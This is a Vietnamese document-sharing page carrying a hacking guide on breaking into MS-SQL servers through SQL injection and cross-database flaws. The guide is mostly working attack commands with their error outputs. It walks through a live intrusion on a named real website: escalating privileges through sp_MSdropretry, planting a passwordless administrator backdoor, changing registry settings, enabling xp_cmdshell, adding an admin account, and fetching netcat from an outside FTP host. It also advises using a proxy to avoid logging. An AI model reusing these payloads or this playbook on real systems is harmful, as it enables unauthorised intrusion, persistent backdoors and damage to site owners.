Thâm nhập máy chủ Ms-Sql qua lỗi Sql-Injection, Cross-Database

Chia sẻ: Vietnam 9h | Ngày: | Loại File: DOC | Số trang:7

Thêm vào BST

Báo xấu

152
lượt xem 21
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

PHÁT HIỆN LỖI SQLINJECTION http://www.company.com/product/price.asp?id=1 select price from product where id=1 http://www.company.com/product/price.asp?id=1’ select price from product where id=1’ Unclosed quotation mark before the character string ‘ http://www.company.com/product/price.asp?id=[...]

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Thâm nhập máy chủ Ms-Sql qua lỗi Sql-Injection, Cross-Database

Xâm nhập máy chủ MsSql qua lỗi SqlInjection & CrossDatabase trang này đã được đọc lần PHẦN I: CÁC KĨ THUẬT HACK TRONG SQL • sqlinjection • convertmagic • crossdatabase PHÁT HIỆN LỖI SQLINJECTION http://www.company.com/product/price.asp?id=1 select price from product where id=1 http://www.company.com/product/price.asp?id=1’ select price from product where id=1’ Unclosed quotation mark before the character string ‘ http://www.company.com/product/price.asp?id=[...] KĨ THUẬT CONVERTMAGIC http://wwww.company.com/product/price.asp?id=1 and 1=convert(int,@@version) sp_password select price from product where id=1 and 1=convert(int,@@version)sp_password Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright (c) 19881998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int. 'sp_password' was found in the text of this event. The text has been replaced with this comment for security reasons. • @@servername, db_name(), system_user, ... • ‘ “ ( ) LỖI CROSSDATABASE CỦA MSSQL use testdatabase create proc dbo.test as select * from master.dbo.sysxlogins go exec test select * from master.dbo.sysxlogins • sa == dbo • db_owner có thể create & design các object của dbo • SID của proc dbo.test == SID của master.dbo.sysxlogins LỖI INJECTION CỦA MASTER..SP_MSDROPRETRY
CREATE PROCEDURE sp_MSdropretry (@tname sysname, @pname sysname) as declare @retcode int /* ** To public */ exec ('drop table ' + @tname) if @@ERROR 0 return(1) exec ('drop procedure ' + @pname) if @@ERROR 0 return(1) return (0) NÂNG QUYỀN QUA MASTER..SP_MSDROPRETRY exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test‘ drop table xx update sysusers set sid=0x01 where name='dbo' drop procedure xx drop table xx update dbo.test set sid=0x01,roles=0x01 where name=guest drop table xx • guest == db_owner của database master PHẦN 2: MINH HỌA HACK SQL • Khai thác lỗi sqlinjection tại nhaxinh.com.vn • Một số kinh nghiệm khi hack SQL LỖI SQLINJECTION TẠI NHAXINH.COM.VN • dùng “proxy.ia2.marketscore.com:80” ðể tránh bị ghi nhật kí http://www.nhaxinh.com.vn/FullStory.asp?id=1 http://www.nhaxinh.com.vn/FullStory.asp?id=1’ Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBCSQLServerDriver] [SQLServer] Unclosed quotation mark before the character string ''. /Including/general.asp, line 840\
XÁC ĐỊNH VERSION http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server] [SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 19882002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int. /Including/general.asp, line 840 XÁC ĐỊNH SERVER_NAME http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int. /Including/general.asp, line 840 http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name()) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int. /Including/general.asp, line 840 http://www.nhaxinh.com.vn/FullStory.asp? id=1 and 1=convert(int,system_user) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int. /Including/general.asp, line 840 • user_name(): các member của “sysadmin” được map sang “dbo” XÁC ĐỊNH MỨC QUYỀN CỦA SQL SERVER http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'') Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server. /Including/general.asp, line 840
• admin đã disable openrowset/sqloledb, sẽ enable lại sau ĐƯA GUEST VÀO DB_OWNER CỦA DATABASE MASTER1 http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test' • Tại sao? guest là db_owner của database master nên guest có thể thi hành xp_regwrite hoặc xp_cmdshell XÁC NHẬN GUEST ĐÃ NẰM TRONG DB_OWNER CỦA DATABASE MASTER CHƯA ? http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 name from master..sysusers where roles=0x01 and name not in('dbo'))) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'guest' to a column of data type int. /Including/general.asp, line 840 CÀI CỬA SAU “BUILTIN\ADMINISTRATORS” http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test' • login vào database với username là “BUILTIN\ADMINISTRATORS” mà không cần password TẠI SAO KHÔNG ADD THẲNG USER “NHAXINH” VÀO SYSADMIN? exec master..sp_addsrvrolemember 'nhaxinh',sysadmin • Lỗi: Invalid object name ‘XXXX’ khi vấn tin CSDL sau này ENABLE OPENROWSET/OLEDB & XÁC ĐỊNH LẠI MỨC QUYỀN CỦA SQL SERVER http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',R EG_DWORD,1 exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAcc ess',REG_DWORD,0— http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'') Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'. /Including/general.asp, line 840 DISABLE FIREWALL CỦA NT & TẮT LOG TRONG SQL http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters' — http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters' — LỖI KHI ENABLE MASTER..XP_CMDSHELL & “ALLOW UPDATES” http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')— Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns. /Including/general.asp, line 840 THÊM DÒNG “SELECT 1” ĐỂ KHẮC PHỤC LỖI http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override') • set “allow updates”=1 cho phép update các “systemtable” (sysusers, syslogins,...) trực tiếp, không qua các “systemprocedure”
CHÚ Ý KHI CHẠY MASTER..XP_CMDSHELL • exec master..xp_cmdshell ‘dir c:\’ “SQLAgentCmdExec” • select * from openrowset('sqloledb', 'server=;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "dir c:\"') “NT AUTHORITY\SYSTEM” XÁC ĐỊNH IP CỦA SERVER http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig' http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25')) (%25 == “%”) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int. /Including/general.asp, line 840 DO THÁM IP “203.162.7.70” C:\> ping 203.162.7.70 Pinging 203.162.7.70 with 32 bytes of data: Reply from 203.162.7.70: bytes=32 time=232ms TTL=118 C:\> ftp 203.162.7.70 Connected to 203.162.7.70. 220 unesco Microsoft FTP Service (Version 5.0). User (203.162.7.70:(none)): • 203.162.7.70 == panvietnam.com FTP TRỰC TIẾP THẤT BẠI ! http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"') (%26 == “&”) C:\> ftp 203.162.7.70 Connected to 203.162.7.70. 220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)): a 331 Password required for a. Password: 530 User a cannot log in. Login failed. ftp> bye UPLOAD NETCAT LÊN SERVER http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp v i n s%3Af" %26 del f') (%3E == “>”) echo open a.b.c.d >f echo user a a >>f echo bin >> f echo cd a >>f echo mget * >>f echo quit >>f ftp v i n s:f del f THẨM TRA XEM NETCAT ĐÃ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ? http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe' http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1)) http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))— Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int. /Including/general.asp, line 840 .